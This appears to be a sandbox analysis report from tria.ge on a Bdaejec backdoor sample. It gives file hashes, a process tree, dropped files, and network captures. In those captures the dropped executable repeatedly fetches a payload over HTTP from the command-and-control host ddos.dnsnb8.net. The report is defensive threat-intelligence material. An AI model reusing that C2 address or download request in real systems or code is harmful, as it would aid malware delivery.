Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07/01/2025, 02:27 UTC

General

  • Target

    2025-01-07_95983cc5bbbfb2a10a812498976b3f60_bkransomware_wapomi.exe

  • Size

    215KB

  • MD5

    95983cc5bbbfb2a10a812498976b3f60

  • SHA1

    9b7bb8cd7db49f4502e20a97adc04d878353a5d9

  • SHA256

    430831eef07d5f484ecd42bd57b4bafc6e90c7ca9ebac5570cecc3edb7e3b614

  • SHA512

    767e8255dca633ea88bc8ba7720d5bc0491f04d0bed96b26f29c5c1d99a933eb51ca60516db579a45d4c193c6271adcd7510f7fcea54f2e7de52beccfc001525

  • SSDEEP

    3072:J666SmGgfYMSLpt690G4EHI8FeqvrvuSUdyfQHoAb3MVD+Q3KLGCH:J2SSI60GhHvjv1Q83Ky

Malware Config

Extracted

Family

bdaejec

C2

ddos.dnsnb8.net

Signatures

  • Bdaejec

    Bdaejec is a backdoor written in C++.

  • Bdaejec family
  • Detects Bdaejec Backdoor. 1 IoCs

    Bdaejec is backdoor written in C++.

  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-01-07_95983cc5bbbfb2a10a812498976b3f60_bkransomware_wapomi.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-01-07_95983cc5bbbfb2a10a812498976b3f60_bkransomware_wapomi.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2824
    • C:\Users\Admin\AppData\Local\Temp\pujNAG.exe
      C:\Users\Admin\AppData\Local\Temp\pujNAG.exe
      2⤵
      • Executes dropped EXE
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2712
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\01b924fa.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2904

Network

  • flag-us
    DNS
    ddos.dnsnb8.net
    pujNAG.exe
    Remote address:
    8.8.8.8:53
    Request
    ddos.dnsnb8.net
    IN A
    Response
    ddos.dnsnb8.net
    IN A
    44.221.84.105
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k1.rar
    pujNAG.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k1.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k1.rar
    pujNAG.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k1.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k1.rar
    pujNAG.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k1.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k1.rar
    pujNAG.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k1.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k1.rar
    http
    pujNAG.exe
    834 B
    92 B
    4
    2

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k1.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k1.rar
    http
    pujNAG.exe
    466 B
    176 B
    3
    4

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k1.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k1.rar
    http
    pujNAG.exe
    466 B
    176 B
    3
    4

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k1.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k1.rar
    http
    pujNAG.exe
    3.3kB
    312 B
    16
    6

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k1.rar
  • 44.221.84.105:799
    ddos.dnsnb8.net
    pujNAG.exe
    144 B
    3
  • 44.221.84.105:799
    ddos.dnsnb8.net
    pujNAG.exe
    152 B
    3
  • 8.8.8.8:53
    ddos.dnsnb8.net
    dns
    pujNAG.exe
    61 B
    77 B
    1
    1

    DNS Request

    ddos.dnsnb8.net

    DNS Response

    44.221.84.105

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\01b924fa.bat

    Filesize

    187B

    MD5

    7039cb94ff33b8849c10ef28dcbe27d8

    SHA1

    07df7e288188c25539b6f33ea96e99afa202bcc6

    SHA256

    853b4b701a563ca25020b08800bb016860427c562d0cf2b64c96e7d1b7db4999

    SHA512

    b3de97177c8f3a8ab20dc2ed83c778208091ef3c453c4b1dfd12b3256f091f8757e55843b7c8f110ea99bb1d91dc17d84dbb26f86726d5f0e29253e4f45296b8

  • \Users\Admin\AppData\Local\Temp\pujNAG.exe

    Filesize

    15KB

    MD5

    56b2c3810dba2e939a8bb9fa36d3cf96

    SHA1

    99ee31cd4b0d6a4b62779da36e0eeecdd80589fc

    SHA256

    4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07

    SHA512

    27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

  • memory/2712-10-0x00000000010A0000-0x00000000010A9000-memory.dmp

    Filesize

    36KB

  • memory/2712-14-0x00000000010A0000-0x00000000010A9000-memory.dmp

    Filesize

    36KB

  • memory/2824-0-0x0000000000140000-0x000000000017C000-memory.dmp

    Filesize

    240KB

  • memory/2824-9-0x0000000000140000-0x000000000017C000-memory.dmp

    Filesize

    240KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.